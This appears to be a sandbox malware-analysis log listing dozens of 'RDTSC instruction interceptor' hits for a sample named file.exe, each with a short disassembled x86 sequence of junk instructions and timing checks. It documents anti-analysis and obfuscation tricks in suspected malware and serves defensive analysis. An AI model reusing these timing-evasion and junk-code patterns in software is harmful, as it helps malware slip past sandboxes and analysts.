              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B202A9 second address: 4B202AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20316 second address: 4B2033C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov di, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c sub ebx, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBF3CD0A8B6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2033C second address: 4B20342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20342 second address: 4B20346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20346 second address: 4B203A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, 00000000h 0x0000000d jmp 00007FBF3CE524C6h 0x00000012 inc ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov cx, dx 0x00000019 pushfd 0x0000001a jmp 00007FBF3CE524C9h 0x0000001f sub ax, AAD6h 0x00000024 jmp 00007FBF3CE524C1h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B203A2 second address: 4B203A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B203A8 second address: 4B203AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B203AC second address: 4B203E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FBF3CD0A8B5h 0x00000011 adc esi, 22BC2EE6h 0x00000017 jmp 00007FBF3CD0A8B1h 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f mov edx, esi 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B203E9 second address: 4B20459 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 0AC798E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a je 00007FBF3CE52724h 0x00000010 jmp 00007FBF3CE524C4h 0x00000015 lea ecx, dword ptr [ebp-14h] 0x00000018 pushad 0x00000019 push ecx 0x0000001a jmp 00007FBF3CE524BDh 0x0000001f pop eax 0x00000020 pushfd 0x00000021 jmp 00007FBF3CE524C1h 0x00000026 and esi, 2E3C5056h 0x0000002c jmp 00007FBF3CE524C1h 0x00000031 popfd 0x00000032 popad 0x00000033 mov dword ptr [ebp-14h], edi 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b mov ebx, 77CF818Ch 0x00000040 popad 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B204DE second address: 4B204F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF3CD0A8B4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B204F6 second address: 4B20524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx edx, si 0x00000010 pushad 0x00000011 mov cl, 7Fh 0x00000013 popad 0x00000014 popad 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBF3CE524BEh 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20524 second address: 4B20533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2057F second address: 4B2059B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF3CE524C8h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2059B second address: 4B205DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007FBF3CD0A8B6h 0x00000012 jg 00007FBFADC8876Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007FBF3CD0A8ADh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B205DC second address: 4B205E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B205E1 second address: 4B2064A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FBF3CD0A90Bh 0x0000000f jmp 00007FBF3CD0A8B6h 0x00000014 cmp dword ptr [ebp-14h], edi 0x00000017 jmp 00007FBF3CD0A8B0h 0x0000001c jne 00007FBFADC88716h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FBF3CD0A8B7h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2064A second address: 4B206C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d call 00007FBF3CE524BCh 0x00000012 pushfd 0x00000013 jmp 00007FBF3CE524C2h 0x00000018 and eax, 3A9AF2E8h 0x0000001e jmp 00007FBF3CE524BBh 0x00000023 popfd 0x00000024 pop ecx 0x00000025 jmp 00007FBF3CE524C9h 0x0000002a popad 0x0000002b lea eax, dword ptr [ebp-2Ch] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FBF3CE524BDh 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B206C9 second address: 4B206CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B206CF second address: 4B206D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B206D3 second address: 4B206D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B206D7 second address: 4B206FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FBF3CE524C4h 0x0000000e mov dword ptr [esp], esi 0x00000011 pushad 0x00000012 mov edx, esi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B206FD second address: 4B2077E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FBF3CD0A8B6h 0x0000000a adc esi, 57043538h 0x00000010 jmp 00007FBF3CD0A8ABh 0x00000015 popfd 0x00000016 popad 0x00000017 popad 0x00000018 nop 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FBF3CD0A8B4h 0x00000020 adc ah, FFFFFF98h 0x00000023 jmp 00007FBF3CD0A8ABh 0x00000028 popfd 0x00000029 jmp 00007FBF3CD0A8B8h 0x0000002e popad 0x0000002f push eax 0x00000030 jmp 00007FBF3CD0A8ABh 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2077E second address: 4B20782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20782 second address: 4B2079D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2079D second address: 4B207ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FBF3CE524BCh 0x00000011 xor ch, FFFFFFE8h 0x00000014 jmp 00007FBF3CE524BBh 0x00000019 popfd 0x0000001a movzx eax, di 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FBF3CE524BCh 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B207ED second address: 4B207FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B207FC second address: 4B20801 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20841 second address: 4B2004B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b pushad 0x0000000c mov dx, cx 0x0000000f mov bx, ax 0x00000012 popad 0x00000013 test esi, esi 0x00000015 jmp 00007FBF3CD0A8B4h 0x0000001a je 00007FBFADC88688h 0x00000020 xor eax, eax 0x00000022 jmp 00007FBF3CCE3FDAh 0x00000027 pop esi 0x00000028 pop edi 0x00000029 pop ebx 0x0000002a leave 0x0000002b retn 0004h 0x0000002e nop 0x0000002f sub esp, 04h 0x00000032 mov esi, eax 0x00000034 cmp esi, 00000000h 0x00000037 setne al 0x0000003a xor ebx, ebx 0x0000003c test al, 01h 0x0000003e jne 00007FBF3CD0A8A7h 0x00000040 jmp 00007FBF3CD0A9AFh 0x00000045 call 00007FBF416562C5h 0x0000004a mov edi, edi 0x0000004c jmp 00007FBF3CD0A8B9h 0x00000051 xchg eax, ebp 0x00000052 jmp 00007FBF3CD0A8AEh 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b mov ax, D2D3h 0x0000005f jmp 00007FBF3CD0A8B8h 0x00000064 popad 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2004B second address: 4B20051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20051 second address: 4B20055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20C56 second address: 4B20CA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FBF3CE524BBh 0x00000013 add eax, 38EBD71Eh 0x00000019 jmp 00007FBF3CE524C9h 0x0000001e popfd 0x0000001f jmp 00007FBF3CE524C0h 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20CA6 second address: 4B20CD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FBF3CD0A8B9h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movsx edi, si 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20CD9 second address: 4B20CEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF3CE524BEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20CEB second address: 4B20CEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20CEF second address: 4B20D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBF3CE524BAh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20D05 second address: 4B20D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20D0B second address: 4B20D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20D0F second address: 4B20D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20D13 second address: 4B20D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [75AF459Ch], 05h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBF3CE524C4h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20E49 second address: 4B20E5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20E5C second address: 4B20E62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20E62 second address: 4B20E66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20E94 second address: 4B20EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF3CE524C3h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20EAB second address: 4B20F1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d pushad 0x0000000e push esi 0x0000000f mov ebx, 114277BEh 0x00000014 pop ebx 0x00000015 jmp 00007FBF3CD0A8B4h 0x0000001a popad 0x0000001b je 00007FBFADC6E342h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 movsx edx, cx 0x00000027 pushfd 0x00000028 jmp 00007FBF3CD0A8B6h 0x0000002d or ax, B7E8h 0x00000032 jmp 00007FBF3CD0A8ABh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B309F2 second address: 4B30A19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBF3CE524C5h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30A19 second address: 4B30AA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov si, D593h 0x00000010 call 00007FBF3CD0A8B8h 0x00000015 pushfd 0x00000016 jmp 00007FBF3CD0A8B2h 0x0000001b sub eax, 6E9F3548h 0x00000021 jmp 00007FBF3CD0A8ABh 0x00000026 popfd 0x00000027 pop ecx 0x00000028 popad 0x00000029 push ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d call 00007FBF3CD0A8B1h 0x00000032 pop ecx 0x00000033 pushfd 0x00000034 jmp 00007FBF3CD0A8B1h 0x00000039 jmp 00007FBF3CD0A8ABh 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30AA9 second address: 4B30AAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30AAF second address: 4B30AB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30AB3 second address: 4B30ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBF3CE524BAh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30B78 second address: 4B30B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30B7C second address: 4B30B97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30B97 second address: 4B30B9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30BBE second address: 4B30BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30BC3 second address: 4B30BF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FBF3CD0A8B0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBF3CD0A8AEh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30BF3 second address: 4B30C04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov esi, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30C04 second address: 4B30C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30C08 second address: 4B30C1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30C1A second address: 4B30C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF3CD0A8AEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30C2C second address: 4B30C30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9E820 second address: 5E9E824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9E824 second address: 5E9E830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9E830 second address: 5E9E835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 601DF59 second address: 601DF5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 601E0BA second address: 601E0D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBF3CD0A8AAh 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 601E0D0 second address: 601E0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007FBF3CE524BCh 0x0000000d jmp 00007FBF3CE524BCh 0x00000012 pop ecx 0x00000013 ja 00007FBF3CE524C2h 0x00000019 jnc 00007FBF3CE524B6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 601E0FF second address: 601E10F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007FBF3CD0A8A6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 601E40E second address: 601E418 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBF3CE524B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 601E418 second address: 601E448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBF3CD0A8B2h 0x0000000c jmp 00007FBF3CD0A8B3h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 601E448 second address: 601E44C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 601E5D2 second address: 601E5F1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF3CD0A8A6h 0x00000008 jmp 00007FBF3CD0A8B0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 601E5F1 second address: 601E5F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6021729 second address: 6021811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 je 00007FBF3CD0A8A6h 0x0000000c pop edi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 call 00007FBF3CD0A8AFh 0x00000016 xor ecx, 757F1325h 0x0000001c pop ecx 0x0000001d push 00000000h 0x0000001f mov dh, bh 0x00000021 push DFE8F180h 0x00000026 jmp 00007FBF3CD0A8AEh 0x0000002b add dword ptr [esp], 20170F00h 0x00000032 jnp 00007FBF3CD0A8BCh 0x00000038 push 00000003h 0x0000003a xor dword ptr [ebp+122D2BFFh], edx 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FBF3CD0A8A8h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 00000018h 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c je 00007FBF3CD0A8ACh 0x00000062 mov dword ptr [ebp+122D2C5Ch], edi 0x00000068 jno 00007FBF3CD0A8AEh 0x0000006e push 00000003h 0x00000070 jno 00007FBF3CD0A8C4h 0x00000076 push 8C39F7D2h 0x0000007b push eax 0x0000007c push edx 0x0000007d ja 00007FBF3CD0A8B6h 0x00000083 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6021882 second address: 6021888 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6021888 second address: 60218B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push eax 0x0000000c jns 00007FBF3CD0A8A7h 0x00000012 stc 0x00000013 pop esi 0x00000014 push 00000000h 0x00000016 push 793F3BCCh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push esi 0x0000001f pop esi 0x00000020 jmp 00007FBF3CD0A8AEh 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6021959 second address: 60219A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jno 00007FBF3CE524BCh 0x00000015 jnl 00007FBF3CE524B8h 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e jbe 00007FBF3CE524BCh 0x00000024 pushad 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 push eax 0x00000028 pop eax 0x00000029 popad 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushad 0x00000032 popad 0x00000033 push ebx 0x00000034 pop ebx 0x00000035 popad 0x00000036 rdtsc
